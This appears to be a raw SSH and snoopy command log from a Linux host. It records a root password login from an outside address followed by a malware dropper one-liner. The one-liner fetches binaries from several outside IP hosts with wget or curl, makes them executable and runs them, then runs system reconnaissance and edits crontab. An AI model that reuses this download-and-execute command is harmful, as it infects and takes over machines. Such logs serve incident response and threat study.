- Jun 20 12:52:56 localhost sshd[6768]: Accepted password for root from 175.126.82.235 port 65452 ssh2
- Jun 20 12:52:56 localhost sshd[6768]: pam_unix(sshd:session): session opened for user root by (uid=0)
- Jun 20 12:52:56 localhost sshd[6768]: subsystem request for sftp
- Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/bin/bash]: bash -c /usr/libexec/openssh/sftp-server
- Jun 20 12:52:56 localhost snoopy[6774]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
- Jun 20 12:52:56 localhost snoopy[6776]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
- Jun 20 12:52:56 localhost snoopy[6772]: [uid:0 sid:6772 tty:(none) cwd:/root filename:/usr/libexec/openssh/sftp-server]: /usr/libexec/openssh/sftp-server
- Jun 20 12:53:11 localhost snoopy[6777]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/bash]: bash -c rm -rf /var/run/sftp.pid;filename="/fuck";$filename || (filename="/6002.rar";cd /;pwd;path=$filename;rm -f $path* || /dev/null > $path;for list in `echo http://43.255.188.2/ http://103.20.195.254/ http://122.10.85.54/`;do (wget -O $filename $list$filename || curl -o $filename $list$filename) && break;done ; if [ -f $path ];then chmod +x $path;$path && echo ExecOK;fi);sleep 1;uname -a;cat /etc/issue;df -h;ps -ef|grep -v $$||ps aux|grep -v $$||ps x|grep -v $$;netstat -antop|grep -v 127.0.0.1||netstat -ano|grep -v 127.0.0.1||netstat -an|grep -v 127.0.0.1;echo ExecOK;cat /var/run/sftp.pid && echo InstallOK;cat /var/run/mount.pid && echo InstallOK;cat /var/run/gcc.pid && echo InstallOK; url=http://43.255.188.2/g.rar;(wget --connect-timeout=20 $url || curl--connect-timeout 20 -O $url) && chmod +x g.rar && ./g.rar
- Jun 20 12:53:11 localhost snoopy[6779]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/sbin/consoletype]: /sbin/consoletype stdout
- Jun 20 12:53:11 localhost snoopy[6781]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/id]: /usr/bin/id -u
- Jun 20 12:53:11 localhost snoopy[6782]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/rm]: rm -rf /var/run/sftp.pid
- Jun 20 12:53:11 localhost snoopy[6783]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/fuck]: /fuck
- Jun 20 12:53:11 localhost snoopy[6785]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/sleep]: sleep 1
- Jun 20 12:53:11 localhost snoopy[6794]: [uid:0 sid:6788 tty:(none) cwd:/root filename:/bin/sed]: sed -i /\/etc\/cron.hourly\/gcc.sh/d /etc/crontab
- Jun 20 12:53:12 localhost snoopy[6813]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/uname]: uname -a
- Jun 20 12:53:12 localhost snoopy[6814]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /etc/issue
- Jun 20 12:53:12 localhost snoopy[6815]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/df]: df -h
- Jun 20 12:53:12 localhost snoopy[6817]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 6777
- Jun 20 12:53:12 localhost snoopy[6816]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/ps]: ps -ef
- Jun 20 12:53:12 localhost snoopy[6819]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/grep]: grep -v 127.0.0.1
- Jun 20 12:53:12 localhost snoopy[6818]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/netstat]: netstat -antop
- Jun 20 12:53:12 localhost snoopy[6820]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/sftp.pid
- Jun 20 12:53:12 localhost snoopy[6821]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/mount.pid
- Jun 20 12:53:12 localhost snoopy[6822]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/bin/cat]: cat /var/run/gcc.pid
- Jun 20 12:53:12 localhost snoopy[6824]: [uid:0 sid:6777 tty:(none) cwd:/root filename:/usr/bin/wget]: wget --connect-timeout=20 http://43.255.188.2/g.rar